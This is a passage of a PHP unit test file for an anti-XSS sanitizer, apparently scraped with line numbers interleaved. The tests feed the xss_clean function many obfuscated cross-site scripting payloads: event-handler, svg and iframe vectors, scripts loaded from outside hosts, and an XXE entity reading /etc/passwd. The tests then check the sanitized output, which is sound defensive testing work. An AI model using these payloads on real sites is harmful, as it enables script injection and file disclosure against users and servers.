<a href="javascript%26colon;alert(1)">click |
|
871
|
|
|
<script/"<a"/src=data:=".<a,[8].some(confirm)> |
|
872
|
|
|
<svg/x=">"/onload=confirm()// |
|
873
|
|
|
<--`<img/src=` onerror=confirm``> --!> |
|
874
|
|
|
<svg%0Aonload=%09((pro\u006dpt))()// |
|
875
|
|
|
<sCript x>(((confirm)))``</scRipt x> |
|
876
|
|
|
<svg </onload ="1> (_=prompt,_(1)) ""> |
|
877
|
|
|
<!--><script src=//14.rs> |
|
878
|
|
|
<embed src=//14.rs> |
|
879
|
|
|
<script x=">" src=//15.rs></script> |
|
880
|
|
|
<!\'/*"/*/\'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> |
|
881
|
|
|
<iframe/src \/\/onload = prompt(1) |
|
882
|
|
|
<x oncut=alert()>x |
|
883
|
|
|
<svg onload=write()> |
|
884
|
|
|
'; |
|
885
|
|
|
|
|
886
|
|
|
$resultStringOrig = ' |
|
887
|
|
|
<details open > |
|
888
|
|
|
<">/*"/=`<`[confir\u006d``]>z |
|
889
|
|
|
<a href="(1)">click |
|
890
|
|
|
|
|
891
|
|
|
<svg/x=">"/=confirm()// |
|
892
|
|
|
<--`<img/> --!> |
|
893
|
|
|
<> |
|
894
|
|
|
<> (_=prompt,_(1)) ""> |
|
895
|
|
|
<!--> |
|
896
|
|
|
<embed src=//14.rs> |
|
897
|
|
|
" src=//15.rs> |
|
898
|
|
|
<Image SrcSet=K */; //> |
|
899
|
|
|
<iframe/src \/\/ |
|
900
|
|
|
<x >x |
|
901
|
|
|
<svg > |
|
902
|
|
|
'; |
|
903
|
|
|
|
|
904
|
|
|
static::assertSame( |
|
905
|
|
|
$resultStringOrig, |
|
906
|
|
|
$this->antiXss->xss_clean($testString), |
|
907
|
|
|
'testing: ' . $testString |
|
908
|
|
|
); |
|
909
|
|
|
|
|
910
|
|
|
static::assertSame( |
|
911
|
|
|
[ |
|
912
|
|
|
0 => '', |
|
913
|
|
|
1 => ' <details open >', |
|
914
|
|
|
2 => ' <">/*', |
|
915
|
|
|
3 => ' <w="/x="y>"/=`<`[confir\u006d``]>z', |
|
916
|
|
|
4 => ' <a href="(1)">click', |
|
917
|
|
|
5 => ' ', |
|
918
|
|
|
6 => ' <svg/x=">"/=confirm()//', |
|
919
|
|
|
7 => ' <--`<img/> --!>', |
|
920
|
|
|
8 => " <svg\n", |
|
921
|
|
|
9 => ' (((confirm)))``x>', |
|
922
|
|
|
10 => ' <svg </">', |
|
923
|
|
|
11 => ' <!-->', |
|
924
|
|
|
12 => ' <embed src=//14.rs>', |
|
925
|
|
|
13 => ' " src=//15.rs>', |
|
926
|
|
|
14 => ' <Image SrcSet=K */; //>', |
|
927
|
|
|
15 => ' <iframe/src \/\/', |
|
928
|
|
|
16 => ' <x >x', |
|
929
|
|
|
17 => ' <svg >', |
|
930
|
|
|
18 => ' ', |
|
931
|
|
|
], |
|
932
|
|
|
$this->antiXss->xss_clean(\explode("\n", $testString)), |
|
933
|
|
|
'testing: ' . $testString |
|
934
|
|
|
); |
|
935
|
|
|
} |
|
936
|
|
|
|
|
937
|
|
|
public function testSpecialString() |
|
938
|
|
|
{ |
|
939
|
|
|
$str = '*/"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. |
|
940
|
|
|
nodeValue+outerHTML>javascript:/*click me'; |
|
941
|
|
|
|
|
942
|
|
|
$str = $this->antiXss->xss_clean($str); |
|
943
|
|
|
|
|
944
|
|
|
static::assertSame('*/"<j"-alert(9)<!-- |
|
945
|
|
|
nodeValue+outerHTML>/*click me', $str); |
|
946
|
|
|
} |
|
947
|
|
|
|
|
948
|
|
|
public function testAllowIframe() |
|
949
|
|
|
{ |
|
950
|
|
|
$testString = ' |
|
951
|
|
|
<video autoplay="autoplay" controls="controls" width="640" height="360"> <source src="http://clips.vorwaerts-gmbh.de/VfE_html5.mp4" type="video/mp4" /> <source src="http://clips.vorwaerts-gmbh.de/VfE.webm" type="video/webm" /> <source src="http://clips.vorwaerts-gmbh.de/VfE.ogv" type="video/ogg" /> <img title="No video playback capabilities, please download the video below" src="/poster.jpg" alt="Big Buck Bunny" width="640" height="360"> </video> |
|
952
|
|
|
<p><strong>Download Video:</strong> Closed Format: <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.mp4">"MP4"</a> Open Format: <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.ogv">"OGG"</a> / <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.webm">"WebM"</a></p> |
|
953
|
|
|
|
|
954
|
|
|
<iframe width="560" height="315" src="https://www.youtube.com/embed/YE7VzlLtp-4?rel=0&controls=0&showinfo=0" frameborder="0" allowfullscreen></iframe> |
|
955
|
|
|
'; |
|
956
|
|
|
|
|
957
|
|
|
$resultStringOrig = ' |
|
958
|
|
|
<video autoplay="autoplay" controls="controls" width="640" height="360"> <source src="http://clips.vorwaerts-gmbh.de/VfE_html5.mp4" type="video/mp4" /> <source src="http://clips.vorwaerts-gmbh.de/VfE.webm" type="video/webm" /> <source src="http://clips.vorwaerts-gmbh.de/VfE.ogv" type="video/ogg" /> <img title="No video playback capabilities, please download the video below" src="/poster.jpg" alt="Big Buck Bunny" width="640" height="360"> </video> |
|
959
|
|
|
<p><strong>Download Video:</strong> Closed Format: <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.mp4">"MP4"</a> Open Format: <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.ogv">"OGG"</a> / <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.webm">"WebM"</a></p> |
|
960
|
|
|
|
|
961
|
|
|
<iframe width="560" height="315" src="https://www.youtube.com/embed/YE7VzlLtp-4?rel=0&controls=0&showinfo=0" frameborder="0" allowfullscreen></iframe> |
|
962
|
|
|
'; |
|
963
|
|
|
|
|
964
|
|
|
static::assertSame( |
|
965
|
|
|
$resultStringOrig, |
|
966
|
|
|
$this->antiXss->xss_clean($testString), |
|
967
|
|
|
'testing: ' . $testString |
|
968
|
|
|
); |
|
969
|
|
|
|
|
970
|
|
|
$this->antiXss->removeEvilHtmlTags(['video', 'source', 'iframe']); |
|
971
|
|
|
|
|
972
|
|
|
$resultString = ' |
|
973
|
|
|
<video autoplay="autoplay" controls="controls" width="640" height="360"> <source src="http://clips.vorwaerts-gmbh.de/VfE_html5.mp4" type="video/mp4" /> <source src="http://clips.vorwaerts-gmbh.de/VfE.webm" type="video/webm" /> <source src="http://clips.vorwaerts-gmbh.de/VfE.ogv" type="video/ogg" /> <img title="No video playback capabilities, please download the video below" src="/poster.jpg" alt="Big Buck Bunny" width="640" height="360"> </video> |
|
974
|
|
|
<p><strong>Download Video:</strong> Closed Format: <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.mp4">"MP4"</a> Open Format: <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.ogv">"OGG"</a> / <a href="http://clips.vorwaerts-gmbh.de/big_buck_bunny.webm">"WebM"</a></p> |
|
975
|
|
|
|
|
976
|
|
|
<iframe width="560" height="315" src="https://www.youtube.com/embed/YE7VzlLtp-4?rel=0&controls=0&showinfo=0" frameborder="0" allowfullscreen></iframe> |
|
977
|
|
|
'; |
|
978
|
|
|
|
|
979
|
|
|
static::assertSame( |
|
980
|
|
|
$resultString, |
|
981
|
|
|
$this->antiXss->xss_clean($testString), |
|
982
|
|
|
'testing: ' . $testString |
|
983
|
|
|
); |
|
984
|
|
|
|
|
985
|
|
|
static::assertSame( |
|
986
|
|
|
'<iframe width="560" height="315" src="https://www.youtube.com/embed/foobar?rel=0&controls=0&showinfo=0" frameborder="0" allowfullscreen></iframe>', |
|
987
|
|
|
$this->antiXss->xss_clean('<iframe width="560" onclick="alert(\'xss\')" height="315" src="https://www.youtube.com/embed/foobar?rel=0&controls=0&showinfo=0" frameborder="0" allowfullscreen></iframe>') |
|
988
|
|
|
); |
|
989
|
|
|
|
|
990
|
|
|
// --- |
|
991
|
|
|
|
|
992
|
|
|
// reset |
|
993
|
|
|
$this->antiXss->addEvilHtmlTags(['video', 'source', 'iframe']); |
|
994
|
|
|
|
|
995
|
|
|
static::assertSame( |
|
996
|
|
|
$resultStringOrig, |
|
997
|
|
|
$this->antiXss->xss_clean($testString), |
|
998
|
|
|
'testing: ' . $testString |
|
999
|
|
|
); |
|
1000
|
|
|
} |
|
1001
|
|
|
|
|
1002
|
|
View Code Duplication |
public function testSvgXssFileV2() |
|
|
|
|
|
|
1003
|
|
|
{ |
|
1004
|
|
|
// PDF-based polyglots through SVG images |
|
1005
|
|
|
// |
|
1006
|
|
|
// http://blog.mindedsecurity.com/2015/08/pdf-based-polyglots-through-svg-images.html |
|
1007
|
|
|
|
|
1008
|
|
|
$testString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v2.svg'); |
|
1009
|
|
|
$testString = \str_replace(["\n\r", "\r\n", "\n"], "\n", $testString); |
|
1010
|
|
|
$resultString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v2_clean.svg'); |
|
1011
|
|
|
$resultString = \str_replace(["\n\r", "\r\n", "\n"], "\n", $resultString); |
|
1012
|
|
|
|
|
1013
|
|
|
static::assertSame( |
|
1014
|
|
|
$resultString, |
|
1015
|
|
|
\html_entity_decode($this->antiXss->xss_clean($testString)), |
|
1016
|
|
|
'testing: ' . $testString |
|
1017
|
|
|
); |
|
1018
|
|
|
} |
|
1019
|
|
|
|
|
1020
|
|
View Code Duplication |
public function testSvgXssFileV3() |
|
|
|
|
|
|
1021
|
|
|
{ |
|
1022
|
|
|
$testString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v3.svg'); |
|
1023
|
|
|
$testString = \str_replace(["\n\r", "\r\n", "\n"], "\n", $testString); |
|
1024
|
|
|
$resultString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v3_clean.svg'); |
|
1025
|
|
|
$resultString = \str_replace(["\n\r", "\r\n", "\n"], "\n", $resultString); |
|
1026
|
|
|
|
|
1027
|
|
|
static::assertSame( |
|
1028
|
|
|
$resultString, |
|
1029
|
|
|
\html_entity_decode($this->antiXss->xss_clean($testString)), |
|
1030
|
|
|
'testing: ' . $testString |
|
1031
|
|
|
); |
|
1032
|
|
|
} |
|
1033
|
|
|
|
|
1034
|
|
View Code Duplication |
public function testXssFileV3() |
|
|
|
|
|
|
1035
|
|
|
{ |
|
1036
|
|
|
$testString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v3.html'); |
|
1037
|
|
|
$testString = \str_replace(["\n\r", "\r\n", "\n"], "\n", $testString); |
|
1038
|
|
|
$resultString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v3_clean.html'); |
|
1039
|
|
|
$resultString = \str_replace(["\n\r", "\r\n", "\n"], "\n", $resultString); |
|
1040
|
|
|
|
|
1041
|
|
|
static::assertSame( |
|
1042
|
|
|
$resultString, |
|
1043
|
|
|
\str_replace(["\n\r", "\r\n", "\n"], "\n", $this->antiXss->xss_clean($testString)), |
|
1044
|
|
|
'testing: ' . $testString |
|
1045
|
|
|
); |
|
1046
|
|
|
} |
|
1047
|
|
|
|
|
1048
|
|
View Code Duplication |
public function testXssFileV4() |
|
|
|
|
|
|
1049
|
|
|
{ |
|
1050
|
|
|
$testString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v4.html'); |
|
1051
|
|
|
$testString = \str_replace(["\n\r", "\r\n", "\n"], "\n", $testString); |
|
1052
|
|
|
$resultString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v4_clean.html'); |
|
1053
|
|
|
$resultString = \str_replace(["\n\r", "\r\n", "\n"], "\n", $resultString); |
|
1054
|
|
|
|
|
1055
|
|
|
static::assertSame( |
|
1056
|
|
|
$resultString, |
|
1057
|
|
|
\str_replace(["\n\r", "\r\n", "\n"], "\n", $this->antiXss->xss_clean($testString)), |
|
1058
|
|
|
'testing: ' . $testString |
|
1059
|
|
|
); |
|
1060
|
|
|
} |
|
1061
|
|
|
|
|
1062
|
|
|
public function testUrls() |
|
1063
|
|
|
{ |
|
1064
|
|
|
$testArray = [ |
|
1065
|
|
|
"<a href=\"https://sellercentral.amazon.com/gp/change-password/change-password-em ail.html?errorMessage=I'm%20sorry,%20the%20Password%20Assistance%20pag e%20is%20temporarily%20unavailable.%20%20Please%20try%20again%20in%201 5%2\">test</a>" => "<a href=\"https://sellercentral.amazon.com/gp/change-password/change-password-em ail.html?errorMessage=I'm%20sorry,%20the%20Password%20Assistance%20pag e%20is%20temporarily%20unavailable.%20%20Please%20try%20again%20in%201 5%2\">test</a>", |
|
1066
|
|
|
"https://sellercentral.amazon.com/gp/change-password/change-password-em ail.html?errorMessage=I'm%20sorry,%20the%20Password%20Assistance%20pag e%20is%20temporarily%20unavailable.%20%20Please%20try%20again%20in%201 5%2" => "https://sellercentral.amazon.com/gp/change-password/change-password-em ail.html?errorMessage=I'm%20sorry,%20the%20Password%20Assistance%20pag e%20is%20temporarily%20unavailable.%20%20Please%20try%20again%20in%201 5%2", |
|
1067
|
|
|
'http://www.amazon.com/script-alert-product-document-cookie/dp/B003H777 5E/ref=sr_1_3?s=gateway&ie=UTF8&qid=1285870078&sr=8-3' => 'http://www.amazon.com/script-alert-product-document-cookie/dp/B003H777 5E/ref=sr_1_3?s=gateway&ie=UTF8&qid=1285870078&sr=8-3', |
|
1068
|
|
|
'https://acme.com/i-ker/kiado+lakas/tegla-epitesu-lakas/budapest+1+kerulet+batthyany+ter/123454' => 'https://acme.com/i-ker/kiado+lakas/tegla-epitesu-lakas/budapest+1+kerulet+batthyany+ter/123454', |
|
1069
|
|
|
]; |
|
1070
|
|
|
|
|
1071
|
|
|
foreach ($testArray as $before => $after) { |
|
1072
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
1073
|
|
|
} |
|
1074
|
|
|
} |
|
1075
|
|
|
|
|
1076
|
|
View Code Duplication |
public function testXmlInjection() |
|
|
|
|
|
|
1077
|
|
|
{ |
|
1078
|
|
|
// XXE injection | http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html#xml-injection |
|
1079
|
|
|
|
|
1080
|
|
|
$testArray = [ |
|
1081
|
|
|
'<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>' => '<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>', |
|
1082
|
|
|
]; |
|
1083
|
|
|
|
|
1084
|
|
|
foreach ($testArray as $before => $after) { |
|
1085
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
1086
|
|
|
} |
|
1087
|
|
|
} |
|
1088
|
|
|
|
|
1089
|
|
|
public function testScriptEncoding() |
|
1090
|
|
|
{ |
|
1091
|
|
|
// https://www.owasp.org/index.php/Testing_for_Cross_site_scripting#Black_Box_testing_and_example |
|
1092
|
|
|
|
|
1093
|
|
|
$testArray = [ |
|
1094
|
|
|
'<script src=http://www.example.com/malicious-code.js></script>' => '', |
|
1095
|
|
|
'%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e' => '', |
|
1096
|
|
|
"\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e" => '', |
|
1097
|
|
|
"'`\"><\x3Cscript>javascript:alert(1)</script>'`\"><\x00script>javascript:alert(1)</script>" => '\'`"><\'`">', |
|
1098
|
|
|
]; |
|
1099
|
|
|
|
|
1100
|
|
|
foreach ($testArray as $before => $after) { |
|
1101
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
1102
|
|
|
} |
|
1103
|
|
|
} |
|
1104
|
|
|
|
|
1105
|
|
|
public function testOnError() |
|
1106
|
|
|
{ |
|
1107
|
|
|
$testArray = [ |
|
1108
|
|
|
'<img src=1 href=1 onerror="javascript:alert(1)"></img>' => '<img ></img>', |
|
1109
|
|
|
'<audio src=1 href=1 onerror="javascript:alert(1)"></audio>' => '<audio ></audio>', |
|
1110
|
|
|
'<video src=1 href=1 onerror="javascript:alert(1)"></video>' => '<video ></video>', |
|
1111
|
|
|
'<body src=1 href=1 onerror="javascript:alert(1)"></body>' => '<body src=1 href=1 ></body>', |
|
1112
|
|
|
'<image src=1 href=1 onerror="javascript:alert(1)"></image>' => '<image src=1 href=1 ></image>', |
|
1113
|
|
|
'<object src=1 href=1 onerror="javascript:alert(1)"></object>' => '<object src=1 href=1 ></object>', |
|
1114
|
|
|
'<script src=1 href=1 onerror="javascript:alert(1)"></script>' => '', |
|
1115
|
|
|
'< / script src=1 href=1 onerror="javascript:alert(1)"></script>' => 'src=1 href=1 ="(1)">', |
|
1116
|
|
|
'<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>' => '<svg svg ></svg >', |
|
1117
|
|
|
]; |
|
1118
|
|
|
|
|
1119
|
|
|
foreach ($testArray as $before => $after) { |
|
1120
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
1121
|
|
|
} |
|
1122
|
|
|
} |
|
1123
|
|
|
|
|
1124
|
|
View Code Duplication |
public function testSvgXss() |
|
|
|
|
|
|
1125
|
|
|
{ |
|
1126
|
|
|
$testArray = [ |
|
1127
|
|
|
'<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(\'This app is probably vulnerable to XSS attacks!\');</script></svg>' => '<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>alert(\'This app is probably vulnerable to XSS attacks!\');</svg>', |
|
1128
|
|
|
'http://vulnerabledomain.com/xss.php?x=%3Csvg%3E%3Cuse%20height=200%20width=200%20xlink:href=%27http://vulnerabledomain.com/xss.php?x=%3Csvg%20id%3D%22rectangle%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20%20%20%20width%3D%22100%22%20height%3D%22100%22%3E%3Ca%20xlink%3Ahref%3D%22javascript%3Aalert%28location%29%22%3E%3Crect%20class%3D%22blue%22%20x%3D%220%22%20y%3D%220%22%20width%3D%22100%22%20height%3D%22100%22%20%2F%3E%3C%2Fa%3E%3C%2Fsvg%3E%23rectangle%27/%3E%3C/svg%3E' => 'http://vulnerabledomain.com/xss.php?x=<svg><use height=200 width=200 /></svg>', |
|
1129
|
|
|
'<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>' => '<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a href="(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>', |
|
1130
|
|
|
'<svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" /></svg>' => '<svg><use /></svg>', |
|
1131
|
|
|
' |
|
1132
|
|
|
<!DOCTYPE html> |
|
1133
|
|
|
<html onAttribute="bar"> |
|
1134
|
|
|
<body onload =load"myFunction()" id=""> |
|
1135
|
|
|
|
|
1136
|
|
|
<h1 onload="test" >Hello World!</h1> |
|
1137
|
|
|
|
|
1138
|
|
|
<script> |
|
1139
|
|
|
function myFunction() { |
|
1140
|
|
|
alert("Page is loaded"); |
|
1141
|
|
|
} |
|
1142
|
|
|
</script> |
|
1143
|
|
|
|
|
1144
|
|
|
</body> |
|
1145
|
|
|
</html> |
|
1146
|
|
|
' => ' |
|
1147
|
|
|
<!DOCTYPE html> |
|
1148
|
|
|
<html > |
|
1149
|
|
|
<body id=""> |
|
1150
|
|
|
|
|
1151
|
|
|
<h1 >Hello World!</h1> |
|
1152
|
|
|
|
|
1153
|
|
|
|
|
1154
|
|
|
|
|
1155
|
|
|
</body> |
|
1156
|
|
|
</html> |
|
1157
|
|
|
', |
|
1158
|
|
|
]; |
|
1159
|
|
|
|
|
1160
|
|
|
foreach ($testArray as $before => $after) { |
|
1161
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
1162
|
|
|
} |
|
1163
|
|
|
} |
|
1164
|
|
|
|
|
1165
|
|
|
public function testJavaScriptCleaning() |
|
1166
|
|
|
{ |
|
1167
|
|
|
// http://cpansearch.perl.org/src/KURIANJA/HTML-Defang-1.02/t/02_xss.t |
|
1168
|
|
|
|
|
1169
|
|
|
$testArray = [ |
|
1170
|
|
|
'<img FSCommand="someFunction()">', |
|
1171
|
|
|
'<img onAbort="someFunction()">', |
|
1172
|
|
|
'<img onActivate="someFunction()">', |
|
1173
|
|
|
'<img onAfterPrint="someFunction()">', |
|
1174
|
|
|
'<img onAfterUpdate="someFunction()">', |
|
1175
|
|
|
'<img onBeforeActivate="someFunction()">', |
|
1176
|
|
|
'<img onBeforeCopy="someFunction()">', |
|
1177
|
|
|
'<img onBeforeCut="someFunction()">', |
|
1178
|
|
|
'<img onBeforeDeactivate="someFunction()">', |
|
1179
|
|
|
'<img onBeforeEditFocus="someFunction()">', |
|
1180
|
|
|
'<img onBeforePaste="someFunction()">', |
|
1181
|
|
|
'<img onBeforePrint="someFunction()">', |
|
1182
|
|
|
'<img onBeforeUnload="someFunction()">', |
|
1183
|
|
|
'<img onBegin="someFunction()">', |
|
1184
|
|
|
'<img onBlur="someFunction()">', |
|
1185
|
|
|
'<img onBounce="someFunction()">', |
|
1186
|
|
|
'<img onCellChange="someFunction()">', |
|
1187
|
|
|
'<img onChange="someFunction()">', |
|
1188
|
|
|
'<img onClick="someFunction()">', |
|
1189
|
|
|
'<img onContextMenu="someFunction()">', |
|
1190
|
|
|
'<img onControlSelect="someFunction()">', |
|
1191
|
|
|
'<img onCopy="someFunction()">', |
|
1192
|
|
|
'<img onCut="someFunction()">', |
|
1193
|
|
|
'<img onDataAvailable="someFunction()">', |
|
1194
|
|
|
'<img onDataSetChanged="someFunction()">', |
|
1195
|
|
|
'<img onDataSetComplete="someFunction()">', |
|
1196
|
|
|
'<img onDblClick="someFunction()">', |
|
1197
|
|
|
'<img onDeactivate="someFunction()">', |
|
1198
|
|
|
'<img onDrag="someFunction()">', |
|
1199
|
|
|
'<img onDragEnd="someFunction()">', |
|
1200
|
|
|
'<img onDragLeave="someFunction()">', |
|
1201
|
|
|
'<img onDragEnter="someFunction()">', |
|
1202
|
|
|
'<img onDragOver="someFunction()">', |
|
1203
|
|
|
'<img onDragDrop="someFunction()">', |
|
1204
|
|
|
'<img onDrop="someFunction()">', |
|
1205
|
|
|
'<img onEnd="someFunction()">', |
|
1206
|
|
|
'<img onError="someFunction()">', |
|
1207
|
|
|
'<img onErrorUpdate="someFunction()">', |
|
1208
|
|
|
'<img onFilterChange="someFunction()">', |
|
1209
|
|
|
'<img onFinish="someFunction()">', |
|
1210
|
|
|
'<img onFocus="someFunction()">', |
|
1211
|
|
|
'<img onFocusIn="someFunction()">', |
|
1212
|
|
|
'<img onFocusOut="someFunction()">', |
|
1213
|
|
|
'<img onHelp="someFunction()">', |
|
1214
|
|
|
'<img onKeyDown="someFunction()">', |
|
1215
|
|
|
'<img onKeyPress="someFunction()">', |
|
1216
|
|
|
'<img onKeyUp="someFunction()">', |
|
1217
|
|
|
'<img onLayoutComplete="someFunction()">', |
|
1218
|
|
|
'<img onLoad="someFunction()">', |
|
1219
|
|
|
'<img onLoseCapture="someFunction()">', |
|
1220
|
|
|
'<img onMediaComplete="someFunction()">', |
|
1221
|
|
|
'<img onMediaError="someFunction()">', |
|
1222
|
|
|
'<img onMouseDown="someFunction()">', |
|
1223
|
|
|
'<img onMouseEnter="someFunction()">', |
|
1224
|
|
|
'<img onMouseLeave="someFunction()">', |
|
1225
|
|
|
'<img onMouseMove="someFunction()">', |
|
1226
|
|
|
'<img onMouseOut="someFunction()">', |
|
1227
|
|
|
'<img onMouseOver="someFunction()">', |
|
1228
|
|
|
'<img onMouseUp="someFunction()">', |
|
1229
|
|
|
'<img onMouseWheel="someFunction()">', |
|
1230
|
|
|
'<img onMove="someFunction()">', |
|
1231
|
|
|
'<img onMoveEnd="someFunction()">', |
|
1232
|
|
|
'<img onMoveStart="someFunction()">', |
|
1233
|
|
|
'<img onOutOfSync="someFunction()">', |
|
1234
|
|
|
'<img onPaste="someFunction()">', |
|
1235
|
|
|
'<img onPause="someFunction()">', |
|
1236
|
|
|
'<img onProgress="someFunction()">', |
|
1237
|
|
|
'<img onPropertyChange="someFunction()">', |
|
1238
|
|
|
'<img onReadyStateChange="someFunction()">', |
|
1239
|
|
|
'<img onRepeat="someFunction()">', |
|
1240
|
|
|
'<img onReset="someFunction()">', |
|
1241
|
|
|
'<img onResize="someFunction()">', |
|
1242
|
|
|
'<img onResizeEnd="someFunction()">', |
|
1243
|
|
|
'<img onResizeStart="someFunction()">', |
|
1244
|
|
|
'<img onResume="someFunction()">', |
|
1245
|
|
|
'<img onReverse="someFunction()">', |
|
1246
|
|
|
'<img onRowsEnter="someFunction()">', |
|
1247
|
|
|
'<img onRowExit="someFunction()">', |
|
1248
|
|
|
'<img onRowDelete="someFunction()">', |
|
1249
|
|
|
'<img onRowInserted="someFunction()">', |
|
1250
|
|
|
'<img onScroll="someFunction()">', |
|
1251
|
|
|
'<img onSeek="someFunction()">', |
|
1252
|
|
|
'<img onSelect="someFunction()">', |
|
1253
|
|
|
'<img onSelectionChange="someFunction()">', |
|
1254
|
|
|
'<img onSelectStart="someFunction()">', |
|
1255
|
|
|
'<img onStart="someFunction()">', |
|
1256
|
|
|
'<img onStop="someFunction()">', |
|
1257
|
|
|
'<img onSyncRestored="someFunction()">', |
|
1258
|
|
|
'<img onSubmit="someFunction()">', |
|
1259
|
|
|
'<img onTimeError="someFunction()">', |
|
1260
|
|
|
'<img onTrackChange="someFunction()">', |
|
1261
|
|
|
'<img onUnload="someFunction()">', |
|
1262
|
|
|
'<img onURLFlip="someFunction()">', |
|
1263
|
|
|
'<img seekSegmentTime="someFunction()">', |
|
1264
|
|
|
]; |
|
1265
|
|
|
|
|
1266
|
|
|
foreach ($testArray as $test) { |
|
1267
|
|
|
static::assertSame('<img >', $this->antiXss->xss_clean($test)); |
|
1268
|
|
|
} |
|
1269
|
|
|
|
|
1270
|
|
|
$testString = 'http://www.buick.com/encore-luxury-small-crossover/build-your-own.html ?x-zipcode=\';\u006F\u006E\u0065rror=\u0063onfirm;throw\'XSSposed'; |
|
1271
|
|
|
$resultString = 'http://www.buick.com/encore-luxury-small-crossover/build-your-own.html ?x-zipcode=\';=confirm;throw\'XSSposed'; |
|
1272
|
|
|
static::assertSame($resultString, $this->antiXss->xss_clean($testString)); |
|
1273
|
|
|
|
|
1274
|
|
|
$testString = '<img src="http://moelleken.org/test.png" alt="bar" title="foo">'; |
|
1275
|
|
|
static::assertSame('<img src="http://moelleken.org/test.png" alt="bar" title="foo">', $this->antiXss->xss_clean($testString)); |
|
1276
|
|
|
|
|
1277
|
|
|
$testString = '<img src=www.example.com/smiley.gif >'; |
|
1278
|
|
|
static::assertSame('<img >', $this->antiXss->xss_clean($testString)); |
|
1279
|
|
|
|
|
1280
|
|
|
$testString = '<img src="www.example.com/smiley.gif" >'; |
|
1281
|
|
|
static::assertSame('<img src="www.example.com/smiley.gif" >', $this->antiXss->xss_clean($testString)); |
|
1282
|
|
|
|
|
1283
|
|
|
$testString = '<img src=\'www.example.com/smiley.gif\' >'; |
|
1284
|
|
|
static::assertSame('<img src=\'www.example.com/smiley.gif\' >', $this->antiXss->xss_clean($testString)); |
|
1285
|
|
|
|
|
1286
|
|
|
$testString = '<img src="http://moelleken.org/test.png" alt="bar" title="javascript:alert(\'XSS\');">'; |
|
1287
|
|
|
static::assertSame('<img src="http://moelleken.org/test.png" alt="bar" title="(\'XSS\');">', $this->antiXss->xss_clean($testString)); |
|
1288
|
|
|
|
|
1289
|
|
|
$testString = '<img src="<?php echo "http://moelleken.org/test.png" ?>" alt="bar" title="foo">'; |
|
1290
|
|
|
static::assertSame('<img src="">" alt="bar" title="foo">', $this->antiXss->xss_clean($testString)); |
|
1291
|
|
|
|
|
1292
|
|
|
$testString = '<img src="<?php echo "http://moelleken.org/test.png" ?>" alt="bar" title="javascript:alert(\'XSS\');">'; |
|
1293
|
|
|
